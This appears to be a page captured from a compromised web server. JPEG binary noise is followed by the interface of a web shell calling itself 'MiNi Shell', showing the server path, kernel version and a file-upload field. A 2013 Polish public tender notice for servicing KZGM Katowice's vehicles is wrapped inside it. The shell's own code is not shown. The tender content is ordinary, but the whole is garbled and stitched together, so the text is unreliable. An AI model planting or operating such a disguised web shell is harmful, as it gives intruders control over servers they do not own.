JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/529578-N-2013.html

<p class="kh_header"><b>Katowice: PRZEGLĄDY I NAPRAWY POJAZDÓW SAMOCHODOWYCH STANOWIĄCYCH WŁASNOŚĆ KZGM W KATOWICACH</b><br>
<b>Numer ogłoszenia: 529578 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunalny Zakład Gospodarki Mieszkaniowej , ul. Grażyńskiego 5, 40-126 Katowice, woj. śląskie, tel. 32 258 20 21-25, faks 32 258 20 25, 41 63 167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kzgm.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEGLĄDY I NAPRAWY POJAZDÓW SAMOCHODOWYCH STANOWIĄCYCH WŁASNOŚĆ KZGM W KATOWICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na wykonywaniu przeglądów i napraw mechanicznych oraz elektrycznych pojazdów samochodowych stanowiących własność KZGM w Katowicach.
Szczegółowy opis przedmiotu zamówienia - zestawienie ilościowe pojazdów, zakres czynności objętych umową oraz wymagań wobec Wykonawcy - określa: Formularz ofertowy (Załącznik nr 1 do SIWZ - Załącznik nr 4 do umowy) oraz Wzór umowy wraz z załącznikami (Załącznik nr 7 do SIWZ).
Zakres szczegółowy usług objętych umową obejmuje:
CZYNNOŚCI PIERWSZEJ OBSŁUGI TECHNICZNEJ (OT - 1) W DZIEDZINIE MECHANIKI POJAZDOWEJ:
1)	przeglądy okresowe wykonywane raz do roku;
2)	do podstawowych działań w zakresie OT - 1 należy: ogólny przegląd pojazdu; smarowanie; sprawdzenie i regulacja  hamulca ręcznego oraz zasadniczego (nożnego); przygotowanie pojazdu do przeglądu rejestracyjnego.
CZYNNOŚCI PIERWSZEJ OBSŁUGI TECHNICZNEJ (OT - 1) W DZIEDZINIE ELEKTRYKI SAMOCHODOWEJ:
1)	czynności obsługowo - elektryczne: oczyszczenie  akumulatora, pokryw i otworów wentylacyjnych w korkach ogniw; uzupełnienie elektrolitu; oczyszczenie końcówek akumulatora;
2)	czynności kontrolno - przeglądowe obejmujące sprawdzenie: działania rozrusznika i alternatora; stanu i działania sygnałów, świateł zewnętrznych i wewnętrznych; ustawienie świateł reflektorów (w razie potrzeby); działania wycieraczek i kierunkowskazów; wskazań wskaźnika oleju.
CZYNNOŚCI DRUGIEJ OBSŁUGI TECHNICZNEJ (OT - 2) W DZIEDZINIE MECHANIKI POJAZDOWEJ: druga obsługa techniczna (OT - 2) pojazdów obejmuje czynności wchodzące w zakres pierwszej obsługi technicznej (OT - 1) a ponadto:
1)	przeglądy okresowe wykonywane co 10 000 km;
2)	do podstawowych działań w zakresie  OT - 2 należy: sprawdzenie stanu oleju w silniku, skrzyni biegów i tylnym moście i ewentualna ich wymiana (w zależności od przebiegu kilometrów); wymiana filtrów paliwa, oleju, powietrza, przeciwpyłowego; sprawdzenie poziomu płynu chłodniczego, ewentualna wymiana; sprawdzenie poziomu płynu hamulcowego, ewentualna wymiana; sprawdzenie ogólnego stanu technicznego pojazdu i ewentualne  usunięcie wykrytych usterek.
CZYNNOŚCI DRUGIEJ OBSŁUGI TECHNICZNEJ (OT - 2) W DZIEDZINIE ELEKTRYKI SAMOCHODOWEJ: druga obsługa techniczna (OT - 2) pojazdów obejmuje czynności wchodzące w zakres pierwszej obsługi technicznej (OT - 1) a ponadto:
1)	czynności obsługowo - elektryczne: przegląd akumulatorów, alternatora i rozrusznika; przegląd zamocowania wyłącznika prądu regulatora napięcia oraz  sprawdzenie ich działania; dokręcenie zacisków połączeń przewodów instalacji elektrycznej pomiędzy akumulatorem, rozrusznikiem i alternatorem;
2)	czynności kontrolno - przeglądowe, obejmujące sprawdzenie: napięcia ogniw akumulatora; stan przewodów i połączeń instalacji elektrycznej pojazdu.
KONSERWACJA I NAPRAWY:
1)	sezonowe mycie i konserwacja podwozia;
2)	naprawa wszelkich usterek zgłoszonych przez kierowcę, oraz wykonanie drobnych poprawek lakierniczych blacharskich;
3)	naprawa i wymiana ogumienia oraz naprawa i prostowanie felg,  diagnostyka i serwis ogumienia;
4)	wyważanie kół, geometria kół;
5)	wymiana wahacza, wymiana przegubów, drążka kierownicy;
6)	wymiana łożyska koła, stabilizatora, amortyzatora oraz wymiana klocków hamulcowych, bębnów hamulcowych, szczęk hamulcowych;
7)	regulacja hamulca ręcznego, wymiana płynu hamulcowego, linki hamulca;
8)	wymiana przewodów, pompy hamulcowej, pompy wspomagania;
9)	wymiana oleju w silniku i podzespołach;
10)	wymiana filtra paliwa , powietrza i kabiny;
11)	wymiana pompy wody, paska klinowego, sprzęgła, uszczelki pod głowicą oraz resora i sprężyn;
12)	usuwanie awarii układu kierowniczego, paliwowego, chłodniczego i  hamulcowego;
13)	diagnostyka, konserwacja i naprawy układów klimatyzacji (napełnianie, odgrzybianie i ozonowanie klimatyzacji);
14)	sezonowe zabezpieczanie styków i połączeń instalacji elektrycznej przed wilgocią,
15)	wymiana świecy żarowej;
16)	wymiana akumulatora oraz test sprawności akumulatora i alternatora;
17)	wymiana rozrusznika i alternatora;
18)	wymiana sondy lambda, wymiana wycieraczki szyby oraz żarówek;
19)	regulacja zapłonu i ustawienia świateł;
20)	naprawa wszelkich usterek zgłoszonych przez kierowcę;
21)	usuwanie awarii rozrusznika, alternatora, układu zapłonowego;
22)	usuwanie innych usterek wynikłych z eksploatacji i użytkowania pojazdu; 
23)	mycie pojazdu samochodowego po dokonanej naprawie.
POZOSTAŁE, NIEWYMIENIONE NAPRAWY, KTÓRYCH RODZAJU ZAMAWIAJĄCY NIE JEST W STANIE PRZEWIDZIEĆ.
UWAGA! W niniejszym postępowaniu Zamawiający przewiduje skorzystanie z instytucji  PRAWA OPCJI z powodu niemożności dokładnego określenia ilości przeglądów oraz ilości napraw (wymienionych w pkt 1 ppkt A1, B i C Załącznika nr 1 do SIWZ). Zakres minimalny zamówienia, który na pewno zostanie zrealizowany obejmuje wykonanie przeglądów technicznych OT-2 - w ilościach wymienionych w pkt 1 ppkt A2 Formularza ofertowego (Załącznik nr 1 do SIWZ). Prawo opcji polega na możliwości rozszerzenia zakresu zamówienia o przeglądy OT-1 oraz naprawy wymienione w pkt 1 ppkt A1, B i C Formularza ofertowego (Załącznik nr 1 do SIWZ). Konieczność wykonania ww. przeglądów i napraw jest niemożliwa do przewidzenia pod względem ilościowym. Przy ich wycenie należy przyjąć ilości wskazane w Załączniku nr 1 do SIWZ - są to ilości orientacyjne. Zamawiający nie gwarantuje, że podane ilości zostaną osiągnięte w okresie realizacji przedmiotu zamówienia. Górną granicą zobowiązania (największy możliwy zakres zamówienia z uwzględnieniem prawa opacji) jest kwota jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia określona w §4 Wzoru umowy  (Załącznik nr 7 do SIWZ). 
UWAGA! Ilości przeglądów OT-1, typowych napraw oraz ilości  roboczogodzin wskazane w Formularzu ofertowym (Załącznik nr 1 do SIWZ) są wielkościami szacunkowymi. Rozliczenie usługi nastąpi na podstawie ilości faktycznie wykonanych przeglądów, napraw i roboczogodzin z zastosowaniem cen jednostkowych podanych przez Wykonawcę w ww. załączniku, do kwoty jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia (określonej w §4 Wzoru umowy - Załącznik nr 7 do SIWZ). 
Określone w Formularzu ofertowym (Załącznik nr 1 do SIWZ) ilości przeglądów OT-1, typowych napraw oraz roboczogodzin mogą ulec zmianie w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian ilościowych w trakcie realizacji przedmiotu zamówienia. Zamawiający nie gwarantuje w żaden sposób, że środki finansowe oraz podane ilości zostaną osiągnięte w okresie realizacji przedmiotu zamówienia. Wykonawcy nie przysługuje z tego tytułu żadne roszczenie względem Zamawiającego. 
Przeglądy okresowe (OT - 1) należy przeprowadzić raz do roku w okresie wiosennym. Przeglądy okresowe (OT - 2) należy przeprowadzić raz do roku lub co 10.000 km. 
Wykonanie przeglądów oraz napraw pojazdów samochodowych objętych przedmiotem umowy będzie każdorazowo realizowane na podstawie jednostkowych zleceń wystawionych przez Zamawiającego. Wykonawca zobowiązuje się wykonać usługi w terminach wynikających z pisemnego zlecenia. 
Czas oczekiwania na przyjęcie pojazdu do warsztatu nie może być dłuższy niż 24 godziny od  momentu zgłoszenia. Wykonawca zobowiązuje się wykonać każde zlecenie w czasie nie dłuższym niż 48 godzin. W przypadku skomplikowanych zleceń dopuszcza się możliwość przedłużenia terminu wykonania usługi. Ponadto, w sytuacji nagłej awarii, pojazd powinien zostać przyjęty do naprawy poza umówionym terminem. W tym przypadku Wykonawca winien najpóźniej do 12 godzin określić przyczynę awarii i zakres koniecznych prac wraz z wyceną oraz uzyskać akceptację Zamawiającego.  
Wykonawca w promieniu 25 km od siedziby Zamawiającego (40-126 Katowice, Ul. Grażyńskiego 5) powinien posiadać warsztat samochodowy wyposażony w:
1)	Stanowisko do napraw mechanicznych i elektrycznych z podnośnikiem kolumnowym;
2)	Stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia, zawieszenia, geometrii kół;
3)	Stanowisko do wykonywania diagnostyki komputerowej silnika i układów elektronicznych pojazdów;
4)	Stanowisko do wykonywania drobnych napraw blacharsko-lakierniczych;
5)	Urządzenie do wykonywania diagnostyki i serwisowania systemów klimatyzacji.
Wypłata wynagrodzenia nastąpi zgodnie z następującymi zasadami:
1)	Za rzeczywiście wykonane przeglądy techniczne wynagrodzenie będzie liczone na podstawie ceny jednostkowej za wykonanie przeglądu OT-1 lub OT-2. Cena jednostkowa za wykonanie przeglądu OT-1 jest ceną robocizny. Cena jednostkowa za wykonanie przeglądu OT-2 zawiera w sobie koszt robocizny oraz koszt użytych materiałów eksploatacyjnych i części (Formularz ofertowy - Załącznik nr 1 do SIWZ).
2)	Za rzeczywiście wykonane typowe naprawy wynagrodzenie będzie liczone na podstawie ceny jednostkowej za wykonanie danej naprawy, która zawiera w sobie koszt robocizny oraz koszt użytych materiałów eksploatacyjnych i części (Formularz ofertowy - Załącznik nr 1 do SIWZ).
3)	Za rzeczywiście wykonane naprawy nieujęte w pkt 2) wynagrodzenie będzie rozliczane na podstawie ceny jednostkowej za roboczogodzinę - jako suma kosztu robocizny oraz kosztu zużytych materiałów eksploatacyjnych i części. Ze względów na brak możliwości przewidzenia zakresu napraw oraz rodzaju materiałów i części założono, że wartość użytych materiałów i części = wartości robocizny (Formularz ofertowy - Załącznik nr 1 do SIWZ).
Zamawiający wymaga od Wykonawcy udzielenia 6 miesięcznej gwarancji na naprawę pojazdów objętych przedmiotem umowy.     
Części i materiały użyte w naprawach muszą być fabrycznie nowe i posiadać parametry nie gorsze niż zalecane przez producentów poszczególnych pojazdów..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości nie większej niż 50% wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.21.00-4, 50.11.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie złożenie oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie złożenie oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym należy wykazać, że Wykonawca dysponuje niżej wymienionymi narzędziami, wyposażeniem zakładu i urządzeniami technicznymi zlokalizowanymi w promieniu 25km od siedziby Zamawiającego (ul. Grażyńskiego 5, 40-126 Katowice):
Stanowiskiem do napraw mechanicznych i elektrycznych z podnośnikiem kolumnowym;
Stanowiskiem diagnostycznym do sprawdzania układu hamulcowego, kierowniczego, oświetlenia, zawieszenia, geometrii kół;
Stanowiskiem do wykonywania diagnostyki komputerowej silnika i układów elektronicznych pojazdów;
Stanowiskiem do wykonywania drobnych napraw blacharsko-lakierniczych;
Urządzeniem do wykonywania diagnostyki i serwisowania systemów klimatyzacji.
UWAGA! WYŻEJ WYMIENIONE NARZĘDZIA, WYPOSAŻENIE I URZĄDZENIA TECHNICZNE MOGĄ ZNAJDOWAĆ SIĘ W ZAKŁADACH W RÓŻNYCH LOKALIZACJACH, POD WARUNKIEM, ŻE WSZYSTKIE POŁOŻONE BĘDĄ WE WSKAZANEJ ODLEGŁOŚCI OD SIEDZIBY ZAMAWIAJĄCEGO.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie złożenie oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie złożenie oświadczenia z art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powinien również dołączyć następujące dokumenty:
a)	wypełniony Formularz ofertowy - Załącznik nr 1 do SIWZ; 
b)	pełnomocnictwo do reprezentowania Wykonawcy (podpisującego ofertę) - pełnomocnictwo należy dołączyć w oryginale bądź kopii notarialnie potwierdzonej za zgodność z oryginałem;
c)	zakres zamówienia jaki zostanie powierzony podwykonawcy/om - Załącznik nr 6 do SIWZ - jeżeli dotyczy.
Inne oświadczenia, które należy złożyć wraz z ofertą - zgodnie z Załącznikiem nr 1 do SIWZ:
a)	Oświadczenie o akceptacji warunków płatności określonych przez Zamawiającego;           
b)	Oświadczenie o zapoznaniu się z warunkami zamówienia i ich akceptacji bez zastrzeżeń;
c)	Oświadczenie o związaniu ofertą na czas wskazany w specyfikacji;
d)	Oświadczenie o zapoznaniu się z wzorem umowy i akceptacji bez zastrzeżeń;
e)	Oświadczenie, iż oferowany przedmiot zamówienia jest zgodny z wymaganiami i warunkami opisanymi w ustawie oraz określonymi przez zamawiającego w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający po dacie zawarcia umowy jest uprawniony do jej skorygowania poprzez zmniejszenie ilości ruchomości, dla których świadczone są usługi objęte niniejszą umową w następstwie sprzedaży używanych pojazdów samochodowych. Zamawiający przewiduje zmiany umowy w zakresie określonym w §13 Wzoru umowy. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kzgm.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Organizacji Przetargów, 40-877 Katowice, ul. Mieszka I 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2014 godzina 08:45, miejsce: KZGM w Katowicach, 40-126 Katowice, ul. Grażyńskiego 5, I piętro, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dotyczy sekcji II.2) Termin wykonania zamówienia: od dnia podpisania umowy do 31.12.2015r. lub do wyczerpania środków; Dotyczy sekcji III.3.4) Z uwagi na opis sposobu dokonania oceny spełniania warunków udziału w postępowaniu Zamawiający wymaga podania adresu zakładu/ów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com